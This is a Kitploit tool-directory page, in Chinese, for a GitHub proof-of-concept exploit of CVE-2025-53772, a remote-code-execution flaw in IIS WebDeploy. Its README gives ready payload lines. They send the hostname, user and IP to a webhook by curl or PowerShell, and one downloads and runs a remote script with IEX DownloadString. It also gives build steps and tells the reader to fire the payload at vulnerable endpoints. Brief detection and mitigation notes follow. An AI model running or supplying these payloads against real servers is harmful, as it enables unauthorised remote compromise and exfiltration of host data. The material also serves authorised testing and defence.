Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/momollax/cve-2025-53772-iis-webdeploy-rce
漏洞利用Web应用程序漏洞利用命令与控制学习与教育远程访问工具Payload 开发
GitHubmomollax/cve-2025-53772-iis-webdeploy-rce

CVE-2025-53772-IIS-WebDeploy-RCE

CVE-2025-53772 的概念验证漏洞利用程序,该漏洞是 IIS WebDeploy 中通过不安全反序列化导致的远程代码执行漏洞。包含可自定义的载荷生成功能,支持信息收集、命令执行和反向连接 shell。

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库
5721年前尚未审核

CVE-2025-53772 - IIS WebDeploy RCE 漏洞利用

此仓库包含针对 CVE-2025-53772 的概念验证(PoC)漏洞利用程序,该漏洞是 IIS WebDeploy 中因不安全反序列化而导致的远程代码执行(RCE)漏洞。

⚠️ 免责声明

此工具仅用于教育和经授权的安全测试目的。作者不对因使用本软件而造成的任何误用或损害负责。请仅在您拥有或已获得明确测试许可的系统上使用。

🔧 快速设置

1. 自定义 Payload

编辑 poc.cs 第 18-19 行中的 payload,以指定您的目标操作:

csharp// Replace with your webhook URL and desired payload

root@kitploit:~
set.Add("cmd.exe");
set.Add("/c curl -X POST https://webhook.site/YOUR-WEBHOOK-ID -H \"Content-Type: application/json\" -d \"{\\\"hostname\\\":\\\"%COMPUTERNAME%\\\",\\\"user\\\":\\\"%USERNAME%\\\",\\\"ip\\\":\\\"$(curl -s ifconfig.me)\\\",\\\"exploit\\\":\\\"CVE-2025-53772\\\",\\\"timestamp\\\":\\\"%DATE% %TIME%\\\"}\"");

📋 Payload 示例

信息收集(推荐):

root@kitploit:~
csharpset.Add("powershell.exe");
set.Add("-Command \"$hostname=$env:COMPUTERNAME; $user=$env:USERNAME; $ip=(Invoke-RestMethod -Uri 'https://ipinfo.io/ip' -UseBasicParsing); $body=@{hostname=$hostname;user=$user;ip=$ip;exploit='CVE-2025-53772';timestamp=(Get-Date)} | ConvertTo-Json; Invoke-RestMethod -Uri 'https://webhook.site/YOUR-WEBHOOK-ID' -Method Post -Body $body -ContentType 'application/json'\"");

简单命令执行:

root@kitploit:~
csharpset.Add("cmd.exe");
set.Add("/c calc.exe");  // Opens calculator

反弹 Shell(高级):

root@kitploit:~
csharpset.Add("powershell.exe");
set.Add("-Command \"IEX (New-Object Net.WebClient).DownloadString('http://YOUR-SERVER/shell.ps1')\"");

2. 生成漏洞利用 Payload

GitHub Action 将自动编译 PoC 并生成 Base64 编码的 payload:

推送您的更改以触发 GitHub Action 前往您仓库中的 Actions 选项卡 点击最近的一次工作流运行 在控制台输出中找到生成的 payload:

GitHub Actions payload 输出 3. 部署漏洞利用程序 使用生成的 Base64 payload 攻击存在漏洞的 IIS WebDeploy 端点: Payload 部署示例 🎯 漏洞详情

CVE ID:CVE-2025-53772

受影响软件:IIS WebDeploy(多个版本) 漏洞类型:不安全反序列化导致 RCE 攻击向量:远程、无需认证 严重性:严重

🛠️ 手动编译(可选)

如果您更倾向于本地编译而不是使用 GitHub Actions:

bash# Windows with .NET Framework C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe poc.cs poc.exe > payload.txt

或者使用 Visual Studio

csc poc.cs poc.exe 📡 设置 Webhook

前往 webhook.site 获取一个免费的 webhook URL 将 payload 中的 YOUR-WEBHOOK-ID 替换为您的唯一 ID 监控传入请求以查看漏洞利用执行结果

🔍 检测与缓解

检测:

监控异常的 BinaryFormatter 反序列化活动 留意 IIS 工作进程创建的可疑子进程 通过网络监控发现意外的出站连接

缓解措施:

将 IIS WebDeploy 更新到最新的已修补版本 实施输入验证和清理 对反序列化类型使用白名单 部署网络分段与监控

📚 参考资料

CVE-2025-53772 详细信息 Microsoft 安全公告 NIST 漏洞数据库

下载工具